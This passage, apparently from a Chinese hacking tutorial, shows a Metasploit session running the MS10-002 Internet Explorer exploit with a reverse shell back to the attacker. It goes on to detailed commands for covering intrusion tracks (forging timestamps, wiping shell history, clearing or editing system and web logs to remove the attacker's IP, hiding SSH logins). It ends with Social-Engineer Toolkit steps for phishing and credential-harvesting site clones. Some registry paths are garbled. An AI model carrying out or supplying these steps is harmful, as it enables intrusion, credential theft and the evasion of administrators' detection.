alias kill from irb_kill. >> fs.dir.pwd => "C:\\Windows\\system32"
对IE浏览器激光漏洞进行渗透利用
Windows XP
msf6 > use exploit/windows/browser/ms10_002_aurora [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(windows/browser/ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.150 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80 SRVPORT => 80 msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH / URIPATH => / msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443 lport => 443 msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.150:443 [*] Using URL: http://192.168.0.150/ [*] Server started. msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
抹杀记录
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。
最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。
Windows
PowerShell修改时间命令
$(DATE) 表示当前日期和时间;
$(Get-Date) 同$(DATE),表示当前日期和时间;
$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间;
$(Get-Item abc.txt) 表示获取文件的句柄;
$(Get-Item abc.txt).creationtime 获取文件创建时间
$(Get-Item abc.txt).lastaccesstime 获取文件最后访问时间
$(Get-Item abc.txt).lastwritetime 获取文件修改时间
# 设置文件test.txt的时间为当前时间
$(Get-Item abc.txt).creationtime=$(DATE)
$(Get-Item abc.txt).lastaccesstime=$(DATE)
$(Get-Item abc.txt).lastwritetime=$(DATE)
# 设置文件abc.txt的时间为指定的某个时间
$(Get-Item abc.txt).creationtime=$(Get-Date "11/04/2019 20:42:23")
$(Get-Item abc.txt).lastaccesstime=$(Get-Date "11/04/2019 20:42:23")
$(Get-Item abc.txt).lastwritetime=$(Get-Date "11/04/2019 20:42:23")
其他记录
清理“运行”中的历史记录
- 开始菜单中的“运行”菜单里保存着我们通过它运行过的程序及所打开的文件路径与名称。
- 进入注册表编辑器,找到HKEY_CURRENT_ USER\Sortware\Microsoft\Windows\Currentversion\Esploier\Runmru分支。从中选择不需要的或不想要别人看到的记录删除即可。
清理“查找”中的历史记录
- (1)、清理查找计算机的历史记录
- 进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5647分支,选择不需要的或是不想让别人看到的记录删除即可。
- (2)清理查找文件的历史记录
进入注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603分支,从中选择不需要的或是不想让别人看到的记录删除即可。
清理“我最近的文档”中的历史记录
- 在任务栏上右单击,打开“任务栏和开始菜单属性”对话框。单击“开始菜单”“自定义”“高级”,单击“清理”按钮即可清理最近访问过的全部文档。如图2。
- 如果只想删除自己的记录,可以进入资源管理器中的“C:\Documentsnnd Settings\Adminnisyror(用户自己的帐号)\Recent”文件夹,删去自己不想要别人看到的文档即可。
禁止显示上一次登录者的名称
进入注册表编辑器,找到HKEY_ LOCAL_ MACHINE \ Software \ Microsoft \ windowsNT \ Currentversion \ Winlogin 分支,新建一个“DontDisplayLastUserName”的字符串值,并设为“1”,重新启动后,就再不会显示上次登录的用户名了,当需要显示上次登录的用户名时设为“0”即可。
清理“回收站”
- 在windows中简单地删除文件只是将文件转移到了“回收站”中,随时可以恢复查看。比较保险的做法是按住shift再点“删除”,或右击桌面上的“回收站”,选择“属性”,在“全局”选项卡中选择“所有驱动器均使用同一设置”,然后勾选下方的“删除时不将文件移回回收站,而是直接删除”,单击“确定”。
清理剪切板中的记录
- 剪贴板里有时会隐藏着我们太多的秘密,如果不关机就直接离开,下一个上机的人只要按一下Ctrl+V,刚才在剪贴板中的信息就被别人“盗取”了。无需研究如何清空剪贴板,只需用Ctrl+C再随便复制一段无关的内容,原来的内容就会被覆盖。
清理TEMP文件夹中的记录
- 许多应用程序通常会临时保存你的工作结果,离机前应删除被存放在C:\(系统安装盘符)Documents and Settings\Administrator(当前登录用户)\Local Settings\Temp目录下的临时文件。
Linux
修改文件时间戳
ls -l test.txt # 修改文件的修改时间和访问时间 touch -d "2018-04-18 08:00:00" test.txt touch -t 0101080000 test
清除history历史命令记录
#方法1
history # 查看历史操作命令(在Kali Linux下无效) cat ~/.bash_history # history记录文件 vim ~/.bash_history history –c
#方法2
使用vim打开一个文件
vim test.txt # 设置vim不记录命令,vim会将命令历史记录,保存在viminfo文件中。 :set history=0 :!command
#方法3
#通过修改配置文件/etc/profile,使系统不再保存命令记录。默认情况下历史命令将保存1000条,可以将该值改为0,然后保存并退出,最后重启系统使得配置文件生效。
HISTSIZE=0
#方法4
#登录后执行下面命令,不记录历史命令(.bash_history)
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
#方法5
仅在Kali Linux下
rm -rf /root/.zsh_history
清除系统日志痕迹
/var/log/btmp 记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
echo > /var/log/btmp:#清除登录系统失败的记录,查看用lastb命令
echo > /var/log/wtmp:#清除登录系统成功的记录,查看用last命令
echo > /var/log/lastlog:清除用户最后一次登录时间,查看用lastlog命令
echo >/var/log/utmp:清除当前登录用户的信息,查看使用w,who,users等命令
cat /dev/null >/var/log/secure:清除安全日志记录
cat /dev/null >/var/log/message:清除系统日志记录
echo > /var/log/secure //登录信息
echo > /var/log/messages
echo>/var/log/syslog //记录系统日志的服务
echo>/var/log/xferlog
echo>/var/log/auth.log
echo>/var/log/user.log
cat /dev/null > /var/adm/sylog
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/openwebmail.log
cat /dev/null > /var/log/mail.info
清除系统日志痕迹
#日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录IP
sed -i '/自己的ip/'d test.txt
sed -i '/192.168.1.2/'d test.txt
# 全局替换登录IP地址:
sed 's/要被取代的字串/新的字串/g'
sed -i 's/192.168.1.1/192.168.1.2/g' test.txt
隐藏远程SSH登录记录
#隐身登录系统,不会被w、who、last等指令检测到。
ssh -T root@192.168.0.1 /bin/bash -i
#不记录ssh公钥在本地.ssh目录中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I
清除Web入侵痕迹
#直接替换日志ip地址
sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log
#常见日志地址
Apache
%APATCH_HOME%//logs/access.log # 访问日志
%APATCH_HOME%/logs/error.log # 错误日志
Nginx
%NHINX_HOME%/logs/access.log # 访问日志
%NHINX_HOME%/logs/error.log # 错误日志
Tomcat
%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # 请求日志
%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # 启动日志
%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # 本地日志
%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # manager管理日志
%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager专有日志
清除MySQL痕迹
rm ~/.mysql_history cat /dev/null > ~/.mysql_history
社会工程学
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/ cd setoolkit pip3 install -r requirements.txt python setup.py gedit /etc/setoolkit/set.config
网络钓鱼攻击(Spear-Phishing Attack Vector)
利用文件格式漏洞(如PDF)等生成后门并通过email(GMAIL,SENDMAIL,)向目标发送带后门附件的电子邮件,诱使目标打开附件激活后门。
例子:
#cd /usr/share/set # ./setoolkit select from the menu 1) Social-Engineering Attacks 1) Perform a Mass Email Attack 3) Credential Harvester Attack Method 2) Site Cloner … set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150 set:webattack> Enter the url to clone: www.baidu.com [*] Cloning the website: http://www.baidu.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
WEB 方式攻击
SET 可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。
Java Applet 方式
最成功的方式之一,并不是利用java 的漏洞,而是当目标浏览含后门的仿冒站点时会被询问是否允许执行web 中的java applet,一旦点击允许则payload 开始运行,目标将被重定向到真实的网站。
用户端(Client-side)web exploit 方式
利用用户端存在的软件漏洞,一般使用0day进行攻击的效果最好。
账号密码获取(Username and Password Harvesting)
通过克隆一个目标站并诱使攻击目标登陆,截获其账号密码。例如截获GMAIL 密码。
标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重定向到真实网站。
中间人攻击(Man-Left-in-the-Middle)
此方式使用已经被攻陷的网站的HTTP 请求或者网站的XSS 漏洞让用户的登陆信息发送至攻击者的HTTP 服务器。如果你发现了一个网站的XSS 漏洞,可以利用此漏洞构造一个URL发送给目标诱使其打开并登陆以截获登陆信息。
Web Jacking
当目标打开我们的网站时会有一个链接显示为正确的web 地址,此时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。
混合模式(multi-attack)
可同时使用以上多种攻击手段以提高成功率。
介质感染攻击(Infectious Media Generator)
可以让你生成一张光盘或者U盘,里面包含autorun.inf 来运行指定的后门文件或者file-format 漏洞文件。
迷你USB 人机接口设备(Teensy USB HID)
当电脑插入USB 设备且autorun.inf 被禁用时,可使用此方法将USB 设备模拟成一个键盘或鼠标设备,进而截获目标机器的击键记录。
SET 其他特殊功能
包括SET 交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP 隧道,当目标主机只开放HTTP 端口对外放行时可通过此功能与主机进行通信;WEB-GUI,包含了常用攻击和无线攻击向导,输入./set-web 即可运行。
